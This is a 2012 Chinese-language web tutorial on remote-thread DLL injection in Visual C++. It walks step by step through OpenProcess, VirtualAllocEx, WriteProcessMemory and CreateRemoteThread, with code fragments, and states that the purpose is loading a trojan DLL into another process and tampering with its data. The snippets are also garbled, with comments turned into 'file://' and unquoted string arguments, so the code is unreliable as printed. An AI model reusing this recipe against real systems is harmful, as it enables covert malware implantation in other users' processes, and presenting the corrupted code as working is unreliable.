用Visual C++實(shí)現(xiàn)遠(yuǎn)程線程嵌入技術(shù)

作者：時(shí)間：2012-09-18 來(lái)源：網(wǎng)絡(luò)

加入技術(shù)交流群
- 掃碼加入
  和技術(shù)大咖面對(duì)面交流
  海量資料庫(kù)查詢

遠(yuǎn)程線程技術(shù)指的是通過(guò)在另一個(gè)進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入那個(gè)進(jìn)程的內(nèi)存地址空間。我們知道，在進(jìn)程中，可以通過(guò)CreateThread函數(shù)創(chuàng)建線程，被創(chuàng)建的新線程與主線程（就是進(jìn)程啟動(dòng)時(shí)被同時(shí)自動(dòng)建立的那個(gè)線程）共享地址空間以及其他的資源。但是很少有人知道，通過(guò)CreateRemoteThread也同樣可以在另一個(gè)進(jìn)程內(nèi)創(chuàng)建新線程，被創(chuàng)建的遠(yuǎn)程線程同樣可以共享遠(yuǎn)程進(jìn)程（是遠(yuǎn)程進(jìn)程耶?。┑牡刂房臻g，所以，實(shí)際上，我們通過(guò)一個(gè)遠(yuǎn)程線程，進(jìn)入了遠(yuǎn)程進(jìn)程的內(nèi)存地址空間，也就擁有了那個(gè)遠(yuǎn)程進(jìn)程相當(dāng)?shù)臋?quán)限。例如在遠(yuǎn)程進(jìn)程內(nèi)部啟動(dòng)一個(gè)DLL木馬（與進(jìn)入進(jìn)程內(nèi)部相比，啟動(dòng)一個(gè)DLL木馬是小意思，實(shí)際上我們可以隨意篡改那個(gè)遠(yuǎn)程進(jìn)程的數(shù)據(jù)）。

本文引用地址：http://www.butianyuan.cn/article/189897.htm

首先，我們通過(guò)OpenProcess 來(lái)打開我們?cè)噲D嵌入的進(jìn)程（如果遠(yuǎn)程進(jìn)程不允許打開，那么嵌入就無(wú)法進(jìn)行了，這往往是由于權(quán)限不足引起的，解決方法是通過(guò)種種途徑提升本地進(jìn)程的權(quán)限）

hRemoteProcESS = OpenProcess( PROCESS_CREATE_THREAD | file://允許遠(yuǎn)程創(chuàng)建線程

PROCESS_VM_OPERATION | file://允許遠(yuǎn)程VM操作

PROCESS_VM_WRITE,//允許遠(yuǎn)程VM寫

FALSE, dwRemoteProcessId )

由于我們后面需要寫入遠(yuǎn)程進(jìn)程的內(nèi)存地址空間并建立遠(yuǎn)程線程，所以需要申請(qǐng)足夠的權(quán)限（PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE）。

然后，我們可以建立LoadLibraryW函數(shù)這個(gè)線程來(lái)啟動(dòng)我們的DLL木馬，LoadLibraryW函數(shù)是在kernel32.dll中定義的，用來(lái)加載DLL文件，它只有一個(gè)參數(shù)，就是DLL文件的絕對(duì)路徑名pszLibFileName，（也就是木馬DLL的全路徑文件名），但是由于木馬DLL是在遠(yuǎn)程進(jìn)程內(nèi)調(diào)用的，所以我們首先還需要將這個(gè)文件名復(fù)制到遠(yuǎn)程地址空間：（否則遠(yuǎn)程線程是無(wú)法讀到這個(gè)參數(shù)的）

file://計(jì)算DLL路徑名需要的內(nèi)存空間

int cb = (1 + lSTrlenW(pszLibFileName)) * sizeof(WCHAR);

file://使用VirtualAllocEx函數(shù)在遠(yuǎn)程進(jìn)程的內(nèi)存地址空間分配DLL文件名緩沖區(qū)

pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,

MEM_COMMIT, PAGE_READWRITE);

file://使用WriteProcessMemory函數(shù)將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間

iReturnCode = WriteProcessMemory(hRemoteProcess,

pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

file://計(jì)算LoadLibraryW的入口地址

PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)

GetProcAddress(GetModuleHandle(TEXT(Kernel32)), LoadLibraryW);

萬(wàn)事俱備，我們通過(guò)建立遠(yuǎn)程線程時(shí)的地址pfnStartAddr（實(shí)際上就是LoadLibraryW的入口地址）和傳遞的參數(shù)pszLibFileRemote（實(shí)際上是我們復(fù)制過(guò)去的木馬DLL的全路徑文件名）在遠(yuǎn)程進(jìn)程內(nèi)啟動(dòng)我們的木馬DLL：

file://啟動(dòng)遠(yuǎn)程線程LoadLibraryW，通過(guò)遠(yuǎn)程線程調(diào)用用戶的DLL文件

hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,

pfnStartAddr, pszLibFileRemote, 0, NULL);